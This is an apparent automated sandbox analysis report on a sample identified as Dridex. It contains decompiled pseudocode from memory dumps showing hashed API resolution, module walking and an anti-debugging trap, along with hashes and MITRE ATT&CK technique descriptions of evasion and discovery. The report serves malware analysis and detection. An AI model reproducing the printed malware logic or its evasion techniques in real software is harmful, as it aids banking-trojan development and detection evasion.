								_t395 = E708D2F94(0xa5eabdf8, 0x9766f056, 0xa5eabdf8, 0xa5eabdf8);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x708dd2e4 = 1;
					E708CF620( &(_t535[0x38]), 0);
					E708CF620( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E708CF558( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E708D2F94(0xa5eabdf8, 0x22dc1034, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E708CF8C4( &(_t535[0xc]), E708CF568( &(_t535[8])) + 0x14);
								_t369 = E708CF558( &(_t535[0xc]), E708CF568( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E708CF6F0( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E708CF620( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E708CF6F0( &(_t535[8]));
							E708CF6F0( &(_t535[0x164]));
							E708CF620( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E708CF620( &(_t535[0x20]), 0);
							_push(0xa5eabdf8);
							_t289 = E708D1DD0(0xa5eabdf8);
							_t290 = E708D1388( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E708D1D08( &(_t535[0x164]), 0xa5eabdf8);
							_t518 =  &(_t535[0x178]);
							E708CD0D0( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E708D5C40( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E708D5C74( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E708D8D74( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E708CF6F0( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E708CBC00( &(_t535[0x110]));
							}
							E708CD098( &(_t535[0x104]));
							E708CD098(_t518);
							E708CD098( &(_t535[0x15c]));
							E708CD098( &(_t535[0x154]));
							E708D9058( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E708CF6B4( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E708D901C( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E708CF558( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E708CF568( &(_t535[0x44]));
								_t519 =  *(0x708dbce0 + _t381 * 4);
								_t531 = E708D8FE8( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E708D8754( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E708CF568( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E708CF578( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E708CF568( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E708CF8C4( &(_t535[0x20]), E708CF568( &(_t535[0x1c])) + 8);
										E708CF558( &(_t535[0x20]), E708CF568( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E708D30A4(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E708CF8C4( &(_t535[0x48]), _t535[0x70]);
									E708D30A4(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E708CF8DC( &(_t535[0x44]), _t563);
									E708CF8DC( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E708D90A8( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E708D9070( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E708CF6F0( &(_t535[0x144]));
									E708CF6F0( &(_t535[0x134]));
									goto L38;
								}
								 *0x708dd2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E708CF6F0( &(_t535[0x11c]));
							E708D8DD4(_t381,  &(_t535[0xd8]));
							E708CF6F0( &(_t535[0x1c]));
							E708CF6F0( &(_t535[0x44]));
							E708CF6F0( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E708CF558( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E708CF8C4( &(_t535[0x38]), E708CF568( &(_t535[0x34])) + 0x14);
							_t347 = E708CF558( &(_t535[0x38]), E708CF568( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E708CF558( &(_t535[0xc]), _t62);
						_t455 = E708CF558( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x708d14e4
0x708d14eb
0x708d14ee
0x708d14f5
0x708d1c77
0x708d1c77
0x708d14fb
0x708d1506
0x708d1a45
0x708d1a49
0x00000000
0x708d1cc8
0x708d1a4f
0x708d1a52
0x708d1a55
0x708d1a5f
0x708d1a6e
0x708d1a70
0x708d1a77
0x708d1c61
0x708d1c63
0x708d1c66
0x708d1c6a
0x00000000
0x708d1c6a
0x708d1a86
0x708d1a91
0x708d1a98
0x708d1a9b
0x708d1a9d
0x708d1aa0
0x708d1aa3
0x708d1aa9
0x708d1ab7
0x708d1ac7
0x708d1aec
0x708d1afd
0x708d1b00
0x708d1b02
0x708d1b66
0x708d1b69
0x708d1b69
0x708d1b6b
0x708d1b6e
0x708d1b72
0x708d1b72
0x708d1b76
0x00000000
0x00000000
0x708d1b83
0x708d1b89
0x708d1bbd
0x708d1bc3
0x708d1bc5
0x708d1c94
0x708d1c9c
0x708d1c9f
0x708d1ca1
0x708d1cb8
0x708d1cb8
0x708d1ca3
0x708d1ca7
0x708d1cac
0x708d1cac
0x708d1cba
0x708d1cc0
0x708d1bdf
0x708d1bdf
0x708d1be1
0x708d1be1
0x708d1be3
0x708d1be3
0x708d1be8
0x00000000
0x00000000
0x708d1bea
0x708d1beb
0x708d1bee
0x708d1bf1
0x00000000
0x00000000
0x708d1bfd
0x708d1c00
0x708d1c02
0x708d1c19
0x708d1c19
0x708d1c04
0x708d1c08
0x708d1c0d
0x708d1c0d
0x708d1c26
0x708d1c29
0x708d1c32
0x708d1c35
0x708d1c58
0x708d1c5c
0x00000000
0x708d1c5c
0x708d1c3d
0x708d1c3d
0x708d1c49
0x708d1c4c
0x708d1c55
0x00000000
0x708d1c55
0x708d1bcb
0x708d1bdb
0x708d1bdb
0x708d1bdd
0x00000000
0x00000000
0x708d1bd3
0x708d1bd5
0x708d1bd5
0x00000000
0x708d1bdb
0x708d1b8b
0x708d1b93
0x708d1bb3
0x708d1b95
0x708d1b95
0x708d1b9d
0x708d1ba6
0x708d1ba6
0x708d1b9d
0x00000000
0x708d1b93
0x708d1b04
0x708d1b0b
0x00000000
0x00000000
0x708d1b18
0x708d1b1e
0x708d1b23
0x708d1b2a
0x708d1b2e
0x708d1b43
0x708d1b45
0x708d1b47
0x708d1b4d
0x708d1b5b
0x708d1b5b
0x708d1b61
0x00000000
0x708d1b61
0x00000000
0x00000000
0x00000000
0x00000000
0x708d1aab
0x708d1aab
0x708d1aab
0x708d1aac
0x708d1aaf
0x708d1ab3
0x00000000
0x708d1ac9
0x708d1acc
0x708d1acf
0x708d1ad8
0x708d1adb
0x708d1adc
0x708d1ade
0x00000000
0x708d1519
0x708d151b
0x708d1520
0x708d152b
0x708d1539
0x708d154c
0x708d1559
0x708d1562
0x708d1566
0x708d156a
0x708d15b2
0x708d15b2
0x708d15b4
0x708d15bb
0x00000000
0x00000000
0x708d15d4
0x708d15dc
0x708d15e0
0x708d15f5
0x708d15f9
0x708d15fd
0x708d1606
0x708d160c
0x708d160f
0x708d1613
0x708d161b
0x708d161d
0x708d1621
0x708d1628
0x708d1631
0x708d1631
0x708d1635
0x708d164a
0x708d1660
0x708d166d
0x708d166e
0x708d166e
0x708d1670
0x00000000
0x00000000
0x00000000
0x00000000
0x708d162a
0x708d162a
0x708d162a
0x708d162b
0x708d162c
0x00000000
0x708d162a
0x708d15ef
0x708d15f3
0x00000000
0x00000000
0x00000000
0x708d1674
0x708d1674
0x708d1675
0x708d1678
0x708d1682
0x708d1682
0x708d1686
0x708d168d
0x708d16e8
0x708d16ed
0x708d1740
0x708d1740
0x708d1744
0x708d1748
0x708d1572
0x708d1575
0x708d157a
0x708d1580
0x708d1583
0x708d158a
0x708d158e
0x708d1595
0x708d159e
0x708d15a2
0x708d15a6
0x708d15ac
0x00000000
0x00000000
0x00000000
0x708d15ac
0x708d1752
0x708d175e
0x708d1769
0x708d1770
0x708d1779
0x708d1783
0x708d1784
0x708d1792
0x708d1797
0x708d1798
0x708d17a5
0x708d17aa
0x708d17bc
0x708d17c1
0x708d17c6
0x708d17d8
0x708d17ea
0x708d17ef
0x708d17fa
0x708d1801
0x708d1806
0x708d180e
0x708d1817
0x708d1817
0x708d1823
0x708d182a
0x708d1836
0x708d1842
0x708d1850
0x708d1861
0x708d1868
0x708d186d
0x708d1876
0x708d187b
0x708d187d
0x708d1881
0x708d1885
0x708d1892
0x708d189f
0x708d18a3
0x708d18b7
0x708d18bb
0x00000000
0x00000000
0x708d18d0
0x708d18d2
0x708d18da
0x708d18d7
0x708d18d7
0x708d18d7
0x708d18de
0x708d18e0
0x708d18e6
0x708d18ec
0x708d1948
0x708d1951
0x708d1955
0x708d1962
0x708d196b
0x708d1970
0x708d1974
0x708d1977
0x708d19d8
0x708d19ee
0x708d19f9
0x708d19fa
0x708d19fb
0x708d19ff
0x708d1a02
0x708d1c82
0x708d1c85
0x708d1c85
0x00000000
0x708d1a02
0x708d1981
0x708d1991
0x708d199a
0x708d19a3
0x708d19ac
0x708d19ad
0x708d19ae
0x708d19b3
0x708d19bb
0x708d19c3
0x00000000
0x00000000
0x00000000
0x708d19c5
0x708d18f5
0x708d18fa
0x708d18fe
0x708d18fe
0x708d1902
0x708d1905
0x00000000
0x00000000
0x708d1926
0x708d1928
0x708d192c
0x708d192e
0x00000000
0x00000000
0x708d1930
0x708d1937
0x708d1943
0x00000000
0x708d1943
0x708d190a
0x00000000
0x708d1a08
0x708d1a08
0x708d1a09
0x708d1a19
0x708d1a25
0x708d1a2e
0x708d1a37
0x708d1a40
0x00000000
0x708d1a40
0x708d16ef
0x708d16f1
0x708d16f3
0x708d16f8
0x708d16fd
0x708d1710
0x708d1726
0x708d172f
0x708d1730
0x708d1730
0x708d1732
0x708d1733
0x708d1736
0x708d173a
0x00000000
0x708d16f3
0x708d168f
0x708d1699
0x708d169a
0x708d169a
0x708d16a7
0x708d16b3
0x708d16b5
0x708d16b7
0x708d16bb
0x708d16cb
0x708d16cb
0x708d16d2
0x708d16d5
0x708d16d6
0x708d16da
0x708d16e4
0x00000000
0x708d16e4

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a855c5ef9db91c67afeba0676d62c2e9401ad54778142ae1c66ccb7208d1a23b
Instruction ID: ff93cc7c105e0724a88c0df754c72e91ee90a94c141f71785bb8ddea755eab97
Opcode Fuzzy Hash: a855c5ef9db91c67afeba0676d62c2e9401ad54778142ae1c66ccb7208d1a23b
Instruction Fuzzy Hash: 93324670508344AFDB15DF28C891B9EB7F6EF98300F508A6DE596873A1EB70E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 708C6DC8, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E708C6DC8() {

				 *0x708dd280 = GetUserNameW;
				 *0x708DD284 = MessageBoxW;
				 *0x708DD288 = GetLastError;
				 *0x708DD28C = CreateFileA;
				 *0x708DD290 = DebugBreak;
				 *0x708DD294 = FlushFileBuffers;
				 *0x708DD298 = FreeEnvironmentStringsA;
				 *0x708DD29C = GetConsoleOutputCP;
				 *0x708DD2A0 = GetEnvironmentStrings;
				 *0x708DD2A4 = GetLocaleInfoA;
				 *0x708DD2A8 = GetStartupInfoA;
				 *0x708DD2AC = GetStringTypeA;
				 *0x708DD2B0 = HeapValidate;
				 *0x708DD2B4 = IsBadReadPtr;
				 *0x708DD2B8 = LCMapStringA;
				 *0x708DD2BC = LoadLibraryA;
				 *0x708DD2C0 = OutputDebugStringA;
				return 0x708dd280;
			}

0x708c6dd9
0x708c6de1
0x708c6de4
0x708c6df3
0x708c6df6
0x708c6e05
0x708c6e08
0x708c6e17
0x708c6e1a
0x708c6e29
0x708c6e2c
0x708c6e3b
0x708c6e3e
0x708c6e4d
0x708c6e50
0x708c6e5f
0x708c6e62
0x708c6e65

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38b5a7859c8ae11c26d2b2c429ed50e6403aa35371f198d8eff410989947e293
Instruction ID: 8d483ff77ad67b33fe3ae245f6e9d1b96af2d54c47ac2234c8f9adff561596ff
Opcode Fuzzy Hash: 38b5a7859c8ae11c26d2b2c429ed50e6403aa35371f198d8eff410989947e293
Instruction Fuzzy Hash: 0A11BCBAA55A00CF8358CF0BD990A557BF2BB8C310372D2AAD8098B375D734AD45DF94

Uniqueness

Uniqueness Score: -1.00%

Function 708CBC00, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E708CBC00(intOrPtr* __ecx) {
				void* _t1;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E708CC33C(__ecx);
				if(_t1 != 0) {
					L4:
					return _t1;
				} else {
					_t1 = E708D2F8C(0xa5eabdf8, 0x2c2324e8);
					if(_t1 == 0) {
						 *_t4 = 0;
						goto L4;
					} else {
						_push( *_t4);
						asm("int3");
						return _t1;
					}
				}
			}

0x708cbc01
0x708cbc03
0x708cbc0a
0x708cbc29
0x708cbc2a
0x708cbc0c
0x708cbc16
0x708cbc1d
0x708cbc23
0x00000000
0x708cbc1f
0x708cbc1f
0x708cbc21
0x708cbc22
0x708cbc22
0x708cbc1d

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction ID: 448c661d0eb1225f95ecd6c5af14886fc78540eab353bac160e60ee79336e212
Opcode Fuzzy Hash: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction Fuzzy Hash: 17D012B21005426ADF151779FE01B1FE7BBCFD5151F14499AA50167259CFA6C4524021

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 4387387b_by_Libranalysis

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 6220 Parent PID: 5616

General

Chronological Activities

Analysis Process: cmd.exe PID: 6228 Parent PID: 6220

Function 708D07CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Function 708D218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 708D2790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 708D3060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 02DF23FD, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230
memoryCOMMON

Function 708D1140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Function 708D5720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 708D5AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 708D5B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Function 708D5B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Function 708D5B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Function 708D5B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Function 708D5B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Function 708D5D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 708D10CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 708D55B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 708D5DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 708D3564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Function 708C9144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Function 708C1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 708CA5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 708C84E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 708D92DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 708D14D8, Relevance: .6, Instructions: 572
COMMONCrypto

Function 708C6DC8, Relevance: .0, Instructions: 36
COMMON

Function 708CBC00, Relevance: .0, Instructions: 16
COMMON